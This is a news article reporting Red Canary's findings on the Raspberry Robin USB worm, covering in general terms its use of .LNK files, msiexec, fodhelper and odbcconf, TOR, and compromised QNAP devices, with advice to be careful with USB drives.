A relatively new kind of Windows worm, known as Raspberry Robin, has been spreading from victim to victim across Europe, mainly via USB devices. Red Canary intelligence analysts initially discovered this worm in September 2021, and have warned Windows users of its potential threat to their devices.

USB Devices Are the Main Target of Raspberry Robin

The main vehicle of transfer for the Raspberry Robin worm is USB devices. An infected device will show the victim a .LNK file upon insertion, which infects the device through the command prompt via the creation of a msiexec process (known as msiexec.exe). A BAT file is also present in infected devices, which contains two commands.

usb being inserted into laptop behind translucent alert logo

Two additional Windows tools are being exploited by Raspberry Robin: fodhelper.exe and odbcconf.exe. While both are executable files, the former is used to manage Windows features, while the latter is used for the configuration of ODBC (Open Database Connectivity) drivers. Leveraging these three different files allows Raspberry Robin to be less easily detectable. This malware also uses TOR exit nodes to communicate with the rest of its ecosystem, which also makes it trickier to spot.

QNAP NAS Devices Also a Raspberry Robin Target

Compromised QNAP NAS (Network-Attached Storage) devices are also exploited in the Raspberry Robin infection process, wherein the attacker uses HTTP requests that contain the victim’s user and device names after the .LNK file is downloaded. The worm uses a malicious DLL (Dynamic-Link Library) from a compromised QNAP device to gain access to and control over one's system. QNAP devices have been exploited by attackers in the past for various reasons, particularly malware infection.

There's Still Lots More to Learn About Raspberry Robin

Raspberry Robin targets Windows users specifically, and hundreds of devices have already been affected. At the moment, it is still not known how Raspberry Robin spreads from one USB drive to the next, which is a concern in terms of infection mitigation. In a post on the Red Canary Blog, the company claims that they are dealing with "several intelligence gaps" around this wave of Raspberry Robin attacks, including the overall intention of the malware's operators.

Be Wary When Inserting USB Drives Into Your Computer

Raspberry Robin's dynamics and objectives are still not totally understood, which makes it harder for us to determine the true purpose and future of this malware. Windows users must therefore be vigilant about the USB drives that they choose to insert into any of their devices.